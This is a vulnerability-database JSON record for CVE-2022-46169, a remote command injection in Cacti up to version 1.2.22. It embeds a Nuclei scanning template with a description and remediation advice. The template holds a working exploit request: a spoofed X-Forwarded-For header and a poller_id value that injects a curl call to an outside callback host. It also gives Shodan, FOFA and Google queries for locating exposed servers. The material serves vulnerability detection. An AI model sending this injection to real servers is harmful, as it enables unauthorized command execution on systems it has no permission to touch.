{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2022-46169/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2022-46169/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2022-46169/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2022-46169/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2022-46169/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2022-46169"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2022-46169"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2022/CVE-2022-46169.yaml",
    "nuclei_template_severity": "critical",
    "nuclei_template_yaml": "id: CVE-2022-46169\n\ninfo:\n  name: Cacti <=1.2.22 - Remote Command Injection\n  author: Hardik-Solanki,j4vaovo\n  severity: critical\n  description: |\n    Cacti through 1.2.22 is susceptible to remote command injection. There is insufficient authorization within the remote agent when handling HTTP requests with a custom Forwarded-For HTTP header. An attacker can send a specially crafted HTTP request to the affected instance and execute arbitrary OS commands on the server, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n  impact: |\n    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system.\n  remediation: |\n    Upgrade Cacti to version 1.2.23 or later to mitigate this vulnerability.\n  reference:\n    - https://security-tracker.debian.org/tracker/CVE-2022-46169\n    - https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf\n    - https://www.cybersecurity-help.cz/vdb/SB2022121926\n    - https://nvd.nist.gov/vuln/detail/CVE-2022-46169\n    - https://github.com/Cacti/cacti/commit/7f0e16312dd5ce20f93744ef8b9c3b0f1ece2216\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2022-46169\n    cwe-id: CWE-78,CWE-74\n    epss-score: 0.99826\n    epss-percentile: 0.9996\n    cpe: cpe:2.3:a:cacti:cacti:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: cacti\n    product: cacti\n    shodan-query:\n      - title:\"Login to Cacti\"\n      - http.title:\"login to cacti\"\n      - http.title:\"cacti\"\n      - http.favicon.hash:\"-1797138069\"\n    fofa-query:\n      - icon_hash=\"-1797138069\"\n      - title=\"cacti\"\n      - title=\"login to cacti\"\n    google-query:\n      - intitle:\"cacti\"\n      - intitle:\"login to cacti\"\n  tags: cve,cve2022,auth-bypass,cacti,kev,rce,unauth,vkev,vuln\nvariables:\n  useragent: '{{rand_base(6)}}'\n\nhttp:\n  - raw:\n      - |\n        GET /remote_agent.php?action=polldata&local_data_ids[0]=1&host_id=1&poller_id=;curl%20{{interactsh-url}}%20-H%20'User-Agent%3a%20{{useragent}}'; HTTP/1.1\n        Host: {{Hostname}}\n        X-Forwarded-For: 127.0.0.1\n\n    unsafe: true\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '\"value\":'\n          - '\"local_data_id\":'\n        condition: and\n\n      - type: word\n        part: interactsh_protocol\n        words:\n          - \"http\"\n\n      - type: word\n        part: interactsh_request\n        words:\n          - \"User-Agent: {{useragent}}\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a00483046022100c826132549c5aeca7f6515113b8fc026ed7b77614a77da281d02209967e44d22022100991066b290b119103d7c0b1e0947f82192d8b74ea9cbbd750dd6e6cd35ffdf55:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2022-46169"
}